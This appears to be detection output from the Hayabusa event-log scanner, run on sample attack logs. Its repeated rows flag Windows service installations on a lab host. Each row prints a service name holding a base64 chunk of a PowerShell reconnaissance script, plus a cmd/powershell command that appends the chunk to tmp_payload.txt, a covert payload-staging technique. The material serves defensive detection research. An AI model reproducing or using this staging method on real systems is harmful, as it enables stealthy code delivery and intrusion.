tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:34.938 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:34.938 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:34.938 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:36.391 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:36.391 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:36.391 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:37.845 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:37.845 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:37.845 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:39.282 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:39.282 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:39.282 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:40.731 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:40.731 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:40.731 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:42.184 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:42.184 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:42.184 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:43.623 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:43.623 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:43.623 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:45.063 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:45.063 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:45.063 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:46.517 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:46.517 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:46.517 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:48.122 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:48.122 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:48.122 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:49.575 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:49.575 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:49.575 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:51.015 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:51.015 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:51.015 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:52.463 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:52.463 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append 